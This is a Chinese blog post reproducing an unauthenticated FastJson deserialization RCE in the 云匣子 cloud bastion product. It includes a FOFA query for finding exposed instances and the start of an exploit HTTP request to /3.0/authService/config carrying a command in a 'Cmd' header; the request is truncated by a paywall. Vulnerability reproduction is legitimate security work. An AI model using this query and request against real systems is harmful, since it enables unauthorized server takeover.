云匣子 FastJson反序列化RCE漏洞复现

已于 2024-06-26 17:35:58 修改
阅读量1.8k 收藏 11
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-11-27 02:54:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134636463
版权
本文详细介绍了云匣子(云安宝-云匣子)中FastJson反序列化远程代码执行(RCE)漏洞的情况。复现环境为FOFA标记的app,通过特定的Java反序列化链(CB1+Tomcat回显链)可以触发漏洞。建议关闭不必要的互联网暴露面,并升级Fastjson到安全版本以防止攻击。
摘要由CSDN通过智能技术生成

0x01 产品简介

  云匣子是租户连接云资源的安全管理工具,帮助云租户更加安全、精细的管理云上的虚拟机、数据库等资源。 云安宝结合多年的运维和安全实践,将云上的运维和安全有机结合,实现对运维过程的事前规划、事中控制和 事后审计。在此之上,云匣子还完美集成了自动化运维、资产拓扑发现、账号安全等功能

0x02 漏洞概述

  云匣子authService接口处使用存在漏洞 fastjson 组件,未授权的攻击者可通过fastjson 序列化漏洞对云匣子发起攻击获取服务器权限。

0x03 复现环境

FOFA:app="云安宝-云匣子"

0x04 漏洞复现 

Exp-1

POST /3.0/authService/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json;charset=utf-8
Origin
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
匣子堡垒机config接口 fastjson反序列化远程命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
12-08 338
安宝-匣子是租户连接资源的安全管理工具,帮助租户更加安全、精细的管理上的虚拟机、数据库等资源。 该系统config接口存在fastjson 漏洞可执行任意系统命令。
用友NC Cloud blobRefClassSearch FastJson反序列化RCE漏洞复现
最新发布
0xSec
07-13 1052
用友 NC Cloud blobRefClassSearch 接口处存在FastJson反序列化漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
Apache OFBiz 路径遍历导致RCE漏洞
weixin_43167326的博客
06-05 681
WordPress CMS 上的网站数以亿计,该平台及其用户称为威胁行动者的庞大攻击面,因此常常是恶意攻击的目标。其中很多攻击通过插件安装恶意软件,轻松导致数千个甚至数百万个站点易遭攻击。攻击者还倾向于快速利用WordPress 中发现的漏洞
安宝-匣子系统config接口存在fastjson 漏洞可执行任意系统命令。
weixin_62352348的博客
01-13 669
安宝-匣子系统config接口存在fastjson 漏洞可执行任意系统命令。
探秘Fastjson RCE:一款强大的安全漏洞验证工具
gitblog_00077的博客
05-23 390
探秘Fastjson RCE:一款强大的安全漏洞验证工具 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 fastjson-rce-poc 是一个针对Fastjson库的安全漏洞验证项目,它可以帮助开发者和安全研究人员检测其应用程序是否易受远程代码执行(RCE)攻击。该项目提供了一种简单的方法来编译和运行Proof of Concept (PoC) 实例,从而测试特定版...
海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现
0xSec
06-07 2193
由于海康威视综合安防管理平台使用了低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。
美特CRM anotherValue FastJson反序列化RCE漏洞复现
0xSec
06-27 423
美特CRM anotherValue接口处使用存在漏洞fastjson组件,未经身份验证的远程攻击者可通过fastjson序列化漏洞对美特CRM发起攻击,执行任意代码并可获取服务器权限。
Fastjson反序列化RCE漏洞复现—CNVD‐2019‐22238
afei001
10-09 904
fastjson是一款用Java语言编写的高性能功能完善的JSON库。可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据, 使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。
[未公开0day]用友nc存在fastjson漏洞
LiangYueSec的博客
07-11 504
[未公开0day]用友nc存在fastjson漏洞
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2279
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
探秘Java安全漏洞fastjson-RCE PoC工具包
gitblog_00074的博客
06-19 466
探秘Java安全漏洞fastjson-RCE PoC工具包 去发现同类优质开源项目:https://gitcode.com/ 在这个数字化的时代,软件安全至关重要,尤其是当我们谈论企业级应用时。开源社区一直是推动技术创新的重要力量,今天我们将深入探讨一个独特的开源项目——decomplie_jar和fastjson,这是一个专门针对Java Fastjson库中潜在远程代码执行(RCE漏洞的研...
FastjsonRCE1.2.47】漏洞复现
02-24 1636
Fastjson漏洞原理和RCE1.2.47漏洞复现
Java - FastjsonRCE攻击模拟(远程代码执行漏洞
Zong_0915的博客
12-03 1682
Java - FastjsonRCE问题分析及攻击模拟(远程代码执行漏洞Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
0day 未公开用友-nc-cloud-blobRefClassSea反序列化
weixin_43167326的博客
07-10 1384
用友NCCloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款端企业管理软件。用友NCCloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和端化管理。近日,新华三盾山实验室监测到用友官方发布了安全公告,修复了一个存在于用友U8Cloud中的反序列化漏洞,攻击者利用该漏洞可在目标服务器上执行任意代码。
热门Fastjson 中出现高危RCE漏洞
smellycat000的专栏
06-17 1305
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了最近修复的位于热门 Fastjson 库中的一个高危漏洞(CVE-2022-25845),它可被用于执行远程代码。该漏洞和受支持的特性 “AutoType” 中的不受信任的反序列化有关。项目维护人员已于2022年5月23日在版本1.2.83中将其修复。JFrog 公司的研究员 Uriya Yavnie...
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 437
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
fastjson1.2.24反序列化RCE
qq_61860998的博客
06-24 1343
fastjson1.2.24反序列化RCE
技术分享 | Fastjson-RCE漏洞复现
Jeeseen123的博客
05-26 513
Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本 Fastjson1.2.47以及之前的版本 复现 1.1 环境准备 攻击机1 用于接受反弹shell 系统:Win10 x64 安装nc,burpsuit
fastjson反序列化安全漏洞解决方法
04-25
对于 fastjson 反序列化安全漏洞,可以采取以下几个解决方法: 1.禁止使用 fastjson 进行反序列化,并使用其他 JSON 解析库,例如 Jackson 或 Gson。 2.升级 fastjson 至最新版本,因为 fastjson 团队会在新版本中修复已知的安全漏洞。 3.启用 fastjson 的一些安全配置,例如 ParserConfig.setSafeMode(true),该配置可以防止对象类型构建器和 getter/setter 非法访问,从而降低攻击面。 4.限制 fastjson 序列化/反序列化的输入和输出,例如限制反序列化的类路径或白名单等。这样可以减少攻击者利用反序列化漏洞进行代码执行的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值